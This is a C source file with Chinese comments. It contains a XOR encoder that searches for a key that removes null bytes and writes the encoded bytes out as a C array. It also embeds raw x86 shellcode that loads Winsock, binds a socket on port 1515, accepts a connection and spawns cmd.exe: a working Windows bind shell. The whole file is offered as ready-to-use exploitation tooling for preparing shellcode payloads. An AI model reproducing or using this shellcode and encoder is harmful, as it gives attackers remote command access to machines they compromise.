

#include <stdio.h>
#include <windows.h>


//参数1: 原始opcode数组地址
//参数2: opcode数组大小[byte]
//参数3: 需要排除的字符
//参数4: 排除字符数组大小[byte]
//返回值:  使用的key
BOOL  AutoEncode(char *pData, int nDataSize, char * pDisch, int nDischSize)
{

	//1. 循环尝试用不同的key加密, 直到加密结果不出现0x00

	BOOL     ret = 0;
	BOOL		  nOutKey = 0x00;
	unsigned  char * pBuffer = nullptr;

	bool	bComplate = true;

	pBuffer = (unsigned char *) new char[nDataSize + 1];

	for(int key = 0; key < 0xff; key++)
	{
		nOutKey = key;
		bComplate = true;
		for (int i = 0; i < nDataSize ; i++)
		{
			pBuffer[i] = pData[i] ^ key;

			//排除数据
			for (int index = 0; index < nDischSize; index++)
			{
				if (pDisch[index] == pBuffer[i])
				{
					bComplate = false;  //失败 跳出 false
					break;
				}
			}
			if (false == bComplate)
				break;
		}

		if (true == bComplate)
			break;
	}


	//2.  判断加密是否成功,不成功则返回false
	if (!bComplate)
		return FALSE;

	//3. 将加密后的内容保存在文件中
	FILE * fpOutFile;
	DeleteFile(TEXT("encode.txt"));
	if (0 != fopen_s(&fpOutFile, "encode.txt", "w+"))
		return FALSE;
	//3.1 输出"数组定义"
	fprintf(fpOutFile, "char bShellcode[] = { \\");
		//3.2 输出"char bShellcode[] = { ,,,}"

	for (int i = 0; i < nDataSize; i++)
	{

		if (i % 4 == 0 && i % 0x10 != 0)
			fprintf(fpOutFile, " ");  //4个一段   第一段不空格


		if (i % 0x10 == 0)
			fprintf(fpOutFile, "\n"); //4段一行   0不换

		if (i % 0x10 ==0 && i%(4*0x10) ==0 && i!=0)
			fprintf(fpOutFile, "\n"); //4行一节   



		fprintf(fpOutFile, "0x%0.2x,",pBuffer[i]); //宽度为2,  0补齐



	}

		//3.3 输出"数组尾"
	fprintf(fpOutFile, "\n }; //size:0x%0.4x\t key 0x%0.2x;", nDataSize,nOutKey);

	// 4.关闭句柄,释放资源
	fclose(fpOutFile);
	delete[]pBuffer;
	return nOutKey;

}


char bShellCode[] = {
	0x83,0xEC,0x20,0x55,	0x8B,0xEC,0x83,0xEC,	0x10,0xEB,0x20,0x63,	0x6D,0x64,0x2E,0x65,
	0x78,0x65,0x00,0x77,	0x73,0x32,0x5F,0x33,	0x32,0x2E,0x64,0x6C,	0x6C,0x00,0x6B,0x65,
	0x72,0x6E,0x65,0x6C,	0x33,0x32,0x2E,0x64,	0x6C,0x6C,0x00,0xE8,	0x00,0x00,0x00,0x00,
	0x5B,0x89,0x5D,0xFC,	0x64,0x8B,0x35,0x30,	0x00,0x00,0x00,0x8B,	0x76,0x0C,0x8B,0x76,

	0x1C,0x8B,0x36,0x8B,	0x56,0x08,0x52,0x68,	0x87,0x32,0xD8,0xC0,	0xE8,0xBD,0x01,0x00,
	0x00,0x8B,0xF8,0x8D,	0x73,0xEE,0x6A,0x00,	0x6A,0x00,0x56,0xFF,	0xD7,0x89,0x45,0xF8,
	0x8D,0x73,0xE3,0x6A,	0x00,0x6A,0x00,0x56,	0xFF,0xD7,0x89,0x45,	0xF4,0xFF,0x75,0xF4,
	0xFF,0x75,0xF8,0xFF,	0x75,0xFC,0xE8,0x14,	0x00,0x00,0x00,0xFF,	0x75,0xF8,0x68,0x63,

	0x89,0xD1,0x4F,0xE8,	0x86,0x01,0x00,0x00,	0x6A,0x00,0xFF,0xD0,	0x8B,0xE5,0x5D,0x55,
	0x8B,0xEC,0x81,0xEC,	0x00,0x03,0x00,0x00,	0xFF,0x75,0x10,0x68,	0x3D,0x6A,0xB4,0x80,
	0xE8,0x69,0x01,0x00,	0x00,0x8D,0xB5,0x00,	0xFD,0xFF,0xFF,0x56,	0x68,0x20,0x20,0x00,
	0x00,0xFF,0xD0,0x85,	0xC0,0x0F,0x85,0xFF,	0x00,0x00,0x00,0xFF,	0x75,0x10,0x68,0x2D,

	0x32,0x78,0xDE,0xE8,	0x46,0x01,0x00,0x00,	0x6A,0x00,0x6A,0x00,	0x6A,0x00,0x6A,0x06,
	0x6A,0x01,0x6A,0x02,	0xFF,0xD0,0x89,0x45,	0xFC,0xFF,0x75,0x10,	0x68,0x64,0x10,0xA7,
	0xDD,0xE8,0x28,0x01,	0x00,0x00,0x66,0xC7,	0x85,0x00,0xFE,0xFF,	0xFF,0x02,0x00,0x66,
	0xC7,0x85,0x02,0xFE,	0xFF,0xFF,0x05,0xEB,	0xC7,0x85,0x04,0xFE,	0xFF,0xFF,0x00,0x00,

	0x00,0x00,0x8D,0xB5,	0x00,0xFE,0xFF,0xFF,	0x6A,0x14,0x56,0xFF,	0x75,0xFC,0xFF,0xD0,
	0x85,0xC0,0x0F,0x85,	0xA2,0x00,0x00,0x00,	0xFF,0x75,0x10,0x68,	0x0C,0x9F,0xD3,0x4B,
	0xE8,0xE9,0x00,0x00,	0x00,0x68,0xFF,0xFF,	0xFF,0x7F,0xFF,0x75,	0xFC,0xFF,0xD0,0x85,
	0xC0,0x0F,0x85,0x83,	0x00,0x00,0x00,0xFF,	0x75,0x10,0x68,0xB1,	0x1E,0x97,0x01,0xE8,

	0xCA,0x00,0x00,0x00,	0x6A,0x00,0x6A,0x00,	0xFF,0x75,0xFC,0xFF,	0xD0,0x89,0x45,0xFC,
	0xFF,0x75,0x0C,0x68,	0xC9,0xBC,0xA6,0x6B,	0xE8,0xB1,0x00,0x00,	0x00,0x8B,0xD0,0x8D,
	0xBD,0x70,0xFF,0xFF,	0xFF,0xB9,0x11,0x00,	0x00,0x00,0xB8,0x00,	0x00,0x00,0x00,0xFC,
	0xF3,0xAB,0xC7,0x85,	0x70,0xFF,0xFF,0xFF,	0x44,0x00,0x00,0x00,	0xC7,0x45,0x9C,0x00,

	0x01,0x00,0x00,0x66,	0xC7,0x45,0xA0,0x00,	0x00,0x8B,0x75,0xFC,	0x89,0x75,0xA8,0x89,
	0x75,0xAC,0x89,0x75,	0xB0,0x8D,0xB5,0x70,	0xFF,0xFF,0xFF,0x8D,	0xBD,0x00,0xFE,0xFF,
	0xFF,0x8B,0x5D,0x08,	0x8D,0x5B,0xDB,0x57,	0x56,0x6A,0x00,0x6A,	0x00,0x6A,0x00,0x6A,
	0x01,0x6A,0x00,0x6A,	0x00,0x53,0x6A,0x00,	0xFF,0xD2,0x8B,0xE5,	0x5D,0xC2,0x0C,0x00,

	0x55,0x8B,0xEC,0x83,	0xEC,0x04,0xC7,0x45,	0xFC,0x00,0x00,0x00,	0x00,0x53,0x51,0x52,
	0x8B,0x75,0x08,0x33,	0xC9,0x33,0xC0,0x8A,	0x04,0x0E,0x84,0xC0,	0x74,0x16,0x8B,0x5D,
	0xFC,0xC1,0xE3,0x19,	0x8B,0x55,0xFC,0xC1,	0xEA,0x07,0x0B,0xDA,	0x03,0xD8,0x89,0x5D,
	0xFC,0x41,0xEB,0xE3,	0x8B,0x5D,0x0C,0x8B,	0x55,0xFC,0x33,0xC0,	0x3B,0xDA,0x75,0x05,

	0xB8,0x01,0x00,0x00,	0x00,0x5A,0x59,0x5B,	0x8B,0xE5,0x5D,0xC2,	0x08,0x00,0x55,0x8B,
	0xEC,0x83,0xEC,0x0C,	0x52,0x8B,0x55,0x0C,	0x8B,0x72,0x3C,0x8D,	0x34,0x32,0x8B,0x76,
	0x78,0x8D,0x34,0x32,	0x8B,0x7E,0x1C,0x8D,	0x3C,0x3A,0x89,0x7D,	0xFC,0x8B,0x7E,0x20,
	0x8D,0x3C,0x3A,0x89,	0x7D,0xF8,0x8B,0x7E,	0x24,0x8D,0x3C,0x3A,	0x89,0x7D,0xF4,0x33,

	0xC9,0xEB,0x01,0x41,	0x8B,0x75,0xF8,0x8B,	0x34,0x8E,0x8B,0x55,	0x0C,0x8D,0x34,0x32,
	0xFF,0x75,0x08,0x56,	0xE8,0x67,0xFF,0xFF,	0xFF,0x85,0xC0,0x74,	0xE6,0x8B,0x75,0xF4,
	0x33,0xFF,0x66,0x8B,	0x3C,0x4E,0x8B,0x55,	0xFC,0x8B,0x34,0xBA,	0x8B,0x55,0x0C,0x8D,
	0x04,0x32,0x5A,0x8B,	0xE5,0x5D,0xC2,0x08	
};














void main()
{
	char  Disch[1] = { 0x00};
	auto key =  AutoEncode(bShellCode,sizeof(bShellCode), Disch, sizeof(Disch));
	return;
}